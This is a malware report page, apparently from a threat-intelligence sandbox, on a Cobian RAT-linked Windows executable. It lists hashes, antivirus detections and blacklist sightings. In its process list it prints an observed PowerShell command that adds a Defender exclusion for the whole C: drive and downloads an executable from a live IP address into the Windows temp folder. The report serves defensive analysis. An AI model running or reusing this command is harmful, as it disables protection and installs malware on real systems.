bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a
Classification: Malicious
bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a is a malicious file sample. Linked to Cobian Rat malware. Detected by 27 antivirus engines.
Detection summary
- 27 antivirus detections
- 1 IDS alerts
- 2 processes observed
- 1 contacted hosts
- 0 DNS requests
Blacklist sightings
| Description |
Source |
First seen |
Last seen |
Labels |
MITRE ATT&CK |
| Generic Malware |
Hybrid-Analysis |
2025-08-19 10:15:07 |
2025-08-19 11:15:23 |
|
|
| Cobian RAT |
ThreatFox Abuse.ch |
2024-05-30 14:52:55 |
2024-06-01 14:19:56 |
|
S0338 Cobian RAT
|
Sample information
- Filenames
- bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a
- File type
- PE32 executable for MS Windows 6.00 (GUI), Intel i ...
- Size
- 7680 bytes
- MD5
7a70779d9d7de5e370fac0fa2d4ccd13
- SHA-1
c5b31825bfd74ca0eb5150b73aaccc22c49bb392
- SHA-256
bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a
- First indexed
- 2024-05-30 15:18:35
- Last updated
- 2026-04-03 09:33:49
Antivirus detections
| Engine | Detection |
| Antiy-AVL | Trojan/MSIL.Pits |
| BitDefenderTheta | Gen:NN.ZemsilF.36806.am0@aSvWIsm |
| Bkav | W32.AIDetectMalware.CS |
| DeepInstinct | MALICIOUS |
| Fortinet | PossibleThreat |
| Google | Detected |
| Ikarus | Trojan-Downloader.MSIL.Agent |
| Kaspersky | HEUR:Trojan.MSIL.Pits.gen |
| Kingsoft | MSIL.Trojan.Pits.gen |
| Lionic | Trojan.Win32.Pits.4!c |
| Malwarebytes | Generic.Malware/Suspicious |
| MaxSecure | Trojan.Malware.109353662.susgen |
| McAfee | Artemis!7A70779D9D7D |
| McAfeeD | ti!BDDF74962E85 |
| Microsoft | Trojan:Win32/Sabsik.FL.B!ml |
| Paloalto | generic.ml |
| Panda | Trj/Chgt.AD |
| Rising | Trojan.Pits!8.10D50 (CLOUD) |
| Sangfor | Trojan.Win32.Pits.Vna2 |
| SentinelOne | Static AI - Suspicious PE |
| Skyhigh | Artemis!Trojan |
| Sophos | Mal/Generic-S |
| Symantec | ML.Attribute.HighConfidence |
| VBA32 | TScope.Trojan.MSIL |
| Varist | W32/ABRisk.LUFM-5565 |
| ZoneAlarm | HEUR:Trojan.MSIL.Pits.gen |
| alibabacloud | Trojan |
Process list
| Name | Command line |
| bddf74962e855ed859e0ab4944c1c4242024557d9e160cdd523010245152f83a.exe | |
| powershell.exe | -Command "WindowStyle -HiddenAdd-MpPreference -ExclusionPath 'C:\' -Force[Net.ServicePointManager]::SecurityProtocol = 'Tls, Tls11, Tls12, Ssl3'$DownloadUrl = 'http://49.13.194.118/ADServices.exe'$WebResponse = Invoke-WebRequest -Uri $DownloadUrl -Method HeadWrite-Output 'Downloading $DownloadUrl'Start-BitsTransfer -Source $WebResponse.BaseResponse.ResponseUri.AbsoluteUri.Replace('%20', ' ') -Destination 'C:\\Windows\\Temp\\'" |